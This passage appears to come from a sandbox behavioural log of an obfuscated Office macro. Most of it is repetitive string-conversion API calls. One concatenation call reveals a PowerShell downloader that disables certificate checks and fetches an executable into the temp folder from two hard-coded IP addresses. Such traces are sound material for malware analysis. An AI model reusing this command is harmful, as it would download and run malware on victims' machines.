returned 0x409 [0047.451] VarBstrFromI2 (iVal=103, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.451] GetUserDefaultLCID () returned 0x409 [0047.451] VarI2FromStr (in: strIn="103", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.451] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.452] GetUserDefaultLCID () returned 0x409 [0047.452] VarBstrFromI2 (iVal=45, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.452] GetUserDefaultLCID () returned 0x409 [0047.452] VarI2FromStr (in: strIn="45", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.452] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.453] GetUserDefaultLCID () returned 0x409 [0047.453] VarBstrFromI2 (iVal=87, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.453] GetUserDefaultLCID () returned 0x409 [0047.453] VarI2FromStr (in: strIn="87", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.453] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.454] GetUserDefaultLCID () returned 0x409 [0047.454] VarBstrFromI2 (iVal=60, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.455] GetUserDefaultLCID () returned 0x409 [0047.455] VarI2FromStr (in: strIn="60", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.455] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.456] GetUserDefaultLCID () returned 0x409 [0047.456] VarBstrFromI2 (iVal=62, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.456] GetUserDefaultLCID () returned 0x409 [0047.456] VarI2FromStr (in: strIn="62", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.456] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.457] GetUserDefaultLCID () returned 0x409 [0047.457] VarBstrFromI2 (iVal=90, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.457] GetUserDefaultLCID () returned 0x409 [0047.457] VarI2FromStr (in: strIn="90", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.457] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.458] GetUserDefaultLCID () returned 0x409 [0047.458] VarBstrFromI2 (iVal=104, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="ɸ") returned 0x0 [0047.458] GetUserDefaultLCID () returned 0x409 [0047.458] VarI2FromStr (in: strIn="104", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.458] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.459] GetUserDefaultLCID () returned 0x409 [0047.459] VarBstrFromI2 (iVal=80, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.460] GetUserDefaultLCID () returned 0x409 [0047.460] VarI2FromStr (in: strIn="80", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.460] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.461] GetUserDefaultLCID () returned 0x409 [0047.461] VarBstrFromI2 (iVal=78, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.461] GetUserDefaultLCID () returned 0x409 [0047.461] VarI2FromStr (in: strIn="78", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.461] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.462] GetUserDefaultLCID () returned 0x409 [0047.462] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.462] GetUserDefaultLCID () returned 0x409 [0047.462] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.462] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.463] GetUserDefaultLCID () returned 0x409 [0047.463] VarBstrFromI2 (iVal=118, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.463] GetUserDefaultLCID () returned 0x409 [0047.463] VarI2FromStr (in: strIn="118", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.464] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.464] GetUserDefaultLCID () returned 0x409 [0047.465] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.465] GetUserDefaultLCID () returned 0x409 [0047.465] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.465] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.466] GetUserDefaultLCID () returned 0x409 [0047.466] VarBstrFromI2 (iVal=119, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.466] GetUserDefaultLCID () returned 0x409 [0047.466] VarI2FromStr (in: strIn="119", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.466] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.467] GetUserDefaultLCID () returned 0x409 [0047.467] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="Ȁ䁁") returned 0x0 [0047.467] GetUserDefaultLCID () returned 0x409 [0047.467] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.467] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.468] GetUserDefaultLCID () returned 0x409 [0047.468] VarBstrFromI2 (iVal=48, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.468] GetUserDefaultLCID () returned 0x409 [0047.468] VarI2FromStr (in: strIn="48", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.469] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.469] GetUserDefaultLCID () returned 0x409 [0047.470] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\xc570\xee71\x7fe") returned 0x0 [0047.470] GetUserDefaultLCID () returned 0x409 [0047.470] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.470] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.471] GetUserDefaultLCID () returned 0x409 [0047.471] VarBstrFromI2 (iVal=103, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.471] GetUserDefaultLCID () returned 0x409 [0047.471] VarI2FromStr (in: strIn="103", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.471] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.472] GetUserDefaultLCID () returned 0x409 [0047.472] VarBstrFromI2 (iVal=45, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.472] GetUserDefaultLCID () returned 0x409 [0047.472] VarI2FromStr (in: strIn="45", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.472] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.473] GetUserDefaultLCID () returned 0x409 [0047.473] VarBstrFromI2 (iVal=87, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.474] GetUserDefaultLCID () returned 0x409 [0047.474] VarI2FromStr (in: strIn="87", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.474] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.475] GetUserDefaultLCID () returned 0x409 [0047.475] VarBstrFromI2 (iVal=60, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.475] GetUserDefaultLCID () returned 0x409 [0047.475] VarI2FromStr (in: strIn="60", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.475] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.476] GetUserDefaultLCID () returned 0x409 [0047.476] VarBstrFromI2 (iVal=62, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.476] GetUserDefaultLCID () returned 0x409 [0047.476] VarI2FromStr (in: strIn="62", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.476] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.477] GetUserDefaultLCID () returned 0x409 [0047.477] VarBstrFromI2 (iVal=90, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.477] GetUserDefaultLCID () returned 0x409 [0047.477] VarI2FromStr (in: strIn="90", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.477] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.478] GetUserDefaultLCID () returned 0x409 [0047.479] VarBstrFromI2 (iVal=104, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="ɸ") returned 0x0 [0047.479] GetUserDefaultLCID () returned 0x409 [0047.479] VarI2FromStr (in: strIn="104", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.479] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.480] GetUserDefaultLCID () returned 0x409 [0047.480] VarBstrFromI2 (iVal=80, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.480] GetUserDefaultLCID () returned 0x409 [0047.480] VarI2FromStr (in: strIn="80", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.480] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.481] GetUserDefaultLCID () returned 0x409 [0047.481] VarBstrFromI2 (iVal=78, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.481] GetUserDefaultLCID () returned 0x409 [0047.481] VarI2FromStr (in: strIn="78", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.481] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.482] GetUserDefaultLCID () returned 0x409 [0047.482] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.483] GetUserDefaultLCID () returned 0x409 [0047.483] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.483] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.484] GetUserDefaultLCID () returned 0x409 [0047.484] VarBstrFromI2 (iVal=118, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.484] GetUserDefaultLCID () returned 0x409 [0047.484] VarI2FromStr (in: strIn="118", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.484] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.485] GetUserDefaultLCID () returned 0x409 [0047.485] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.485] GetUserDefaultLCID () returned 0x409 [0047.485] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.485] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.486] GetUserDefaultLCID () returned 0x409 [0047.486] VarBstrFromI2 (iVal=119, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.486] GetUserDefaultLCID () returned 0x409 [0047.486] VarI2FromStr (in: strIn="119", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.486] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.488] GetUserDefaultLCID () returned 0x409 [0047.488] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="Ȁ䁁") returned 0x0 [0047.489] GetUserDefaultLCID () returned 0x409 [0047.489] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.489] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.490] GetUserDefaultLCID () returned 0x409 [0047.490] VarBstrFromI2 (iVal=48, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.490] GetUserDefaultLCID () returned 0x409 [0047.490] VarI2FromStr (in: strIn="48", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.490] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.491] GetUserDefaultLCID () returned 0x409 [0047.491] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\xc570\xee71\x7fe") returned 0x0 [0047.491] GetUserDefaultLCID () returned 0x409 [0047.491] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.491] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.492] GetUserDefaultLCID () returned 0x409 [0047.492] VarBstrFromI2 (iVal=103, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.492] GetUserDefaultLCID () returned 0x409 [0047.492] VarI2FromStr (in: strIn="103", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.493] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.493] GetUserDefaultLCID () returned 0x409 [0047.493] VarBstrFromI2 (iVal=45, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.494] GetUserDefaultLCID () returned 0x409 [0047.494] VarI2FromStr (in: strIn="45", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.494] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.495] GetUserDefaultLCID () returned 0x409 [0047.495] VarBstrFromI2 (iVal=87, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.495] GetUserDefaultLCID () returned 0x409 [0047.495] VarI2FromStr (in: strIn="87", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.495] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.496] GetUserDefaultLCID () returned 0x409 [0047.496] VarBstrFromI2 (iVal=60, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.496] GetUserDefaultLCID () returned 0x409 [0047.496] VarI2FromStr (in: strIn="60", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.496] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.499] GetUserDefaultLCID () returned 0x409 [0047.499] VarBstrFromI2 (iVal=62, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.499] GetUserDefaultLCID () returned 0x409 [0047.499] VarI2FromStr (in: strIn="62", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.499] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.500] GetUserDefaultLCID () returned 0x409 [0047.500] VarBstrFromI2 (iVal=90, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.500] GetUserDefaultLCID () returned 0x409 [0047.500] VarI2FromStr (in: strIn="90", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.500] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.500] VarBstrCat (in: bstrLeft="powershell.exe \"<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; (new-object system.net.webclient <#replace ext#> ).downloadfile($string1,($env:temp+'\\fulezad.exe'));}catch{$beos1=0;}return $beos1;}$", bstrRight="mmb1=@('64.44.51.87/electra.crm','89.46.223.114/electra.crm');fo", pbstrResult=0x205f70 | out: pbstrResult=0x205f70) returned 0x0 [0047.502] GetUserDefaultLCID () returned 0x409 [0047.502] VarBstrFromI2 (iVal=104, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\x01ࠋ") returned 0x0 [0047.502] GetUserDefaultLCID () returned 0x409 [0047.502] VarI2FromStr (in: strIn="104", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.502] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.502] GetUserDefaultLCID () returned 0x409 [0047.502] VarBstrFromI2 (iVal=80, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.502] GetUserDefaultLCID () returned 0x409 [0047.502] VarI2FromStr (in: strIn="80", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.503] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.503] GetUserDefaultLCID () returned 0x409 [0047.503] VarBstrFromI2 (iVal=78, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.503] GetUserDefaultLCID () returned 0x409 [0047.503] VarI2FromStr (in: strIn="78", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.503] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.504] GetUserDefaultLCID () returned 0x409 [0047.504] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.504] GetUserDefaultLCID () returned 0x409 [0047.504] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.504] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.505] GetUserDefaultLCID () returned 0x409 [0047.505] VarBstrFromI2 (iVal=118, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.505] GetUserDefaultLCID () returned 0x409 [0047.505] VarI2FromStr (in: strIn="118", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.505] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.505] GetUserDefaultLCID () returned 0x409 [0047.505] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.505] GetUserDefaultLCID () returned 0x409 [0047.505] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.505] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.506] GetUserDefaultLCID () returned 0x409 [0047.506] VarBstrFromI2 (iVal=119, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.506] GetUserDefaultLCID () returned 0x409 [0047.506] VarI2FromStr (in: strIn="119", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.506] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.507] GetUserDefaultLCID () returned 0x409 [0047.507] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="Ȁ䁁") returned 0x0 [0047.507] GetUserDefaultLCID () returned 0x409 [0047.507] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.507] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.508] GetUserDefaultLCID () returned 0x409 [0047.508] VarBstrFromI2 (iVal=48, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.508] GetUserDefaultLCID () returned 0x409 [0047.508] VarI2FromStr (in: strIn="48", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.508] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.508] GetUserDefaultLCID () returned 0x409 [0047.508] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\xc570\xee71\x7fe") returned 0x0 [0047.508] GetUserDefaultLCID () returned 0x409 [0047.508] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.509] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.509] GetUserDefaultLCID () returned 0x409 [0047.509] VarBstrFromI2 (iVal=103, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.509] GetUserDefaultLCID () returned 0x409 [0047.509] VarI2FromStr (in: strIn="103", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.509] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.510] GetUserDefaultLCID () returned 0x409 [0047.510] VarBstrFromI2 (iVal=45, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.510] GetUserDefaultLCID () returned 0x409 [0047.510] VarI2FromStr (in: strIn="45", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.510] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.511] GetUserDefaultLCID () returned 0x409 [0047.511] VarBstrFromI2 (iVal=87, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.511] GetUserDefaultLCID () returned 0x409 [0047.511] VarI2FromStr (in: strIn="87", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.511] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.511] GetUserDefaultLCID () returned 0x409 [0047.511] VarBstrFromI2 (iVal=60, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.511] GetUserDefaultLCID () returned 0x409 [0047.511] VarI2FromStr (in: strIn="60", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.512] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.512] GetUserDefaultLCID () returned 0x409 [0047.512] VarBstrFromI2 (iVal=62, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.512] GetUserDefaultLCID () returned 0x409 [0047.512] VarI2FromStr (in: strIn="62", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.512] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.513] GetUserDefaultLCID () returned 0x409 [0047.513] VarBstrFromI2 (iVal=90, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.513] GetUserDefaultLCID () returned 0x409 [0047.513] VarI2FromStr (in: strIn="90", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.513] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.514] GetUserDefaultLCID () returned 0x409 [0047.514] VarBstrFromI2 (iVal=104, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="ɸ") returned 0x0 [0047.514] GetUserDefaultLCID () returned 0x409 [0047.514] VarI2FromStr (in: strIn="104", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.514] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.514] GetUserDefaultLCID () returned 0x409 [0047.515] VarBstrFromI2 (iVal=80, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.515] GetUserDefaultLCID () returned 0x409 [0047.515] VarI2FromStr (in: strIn="80", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | 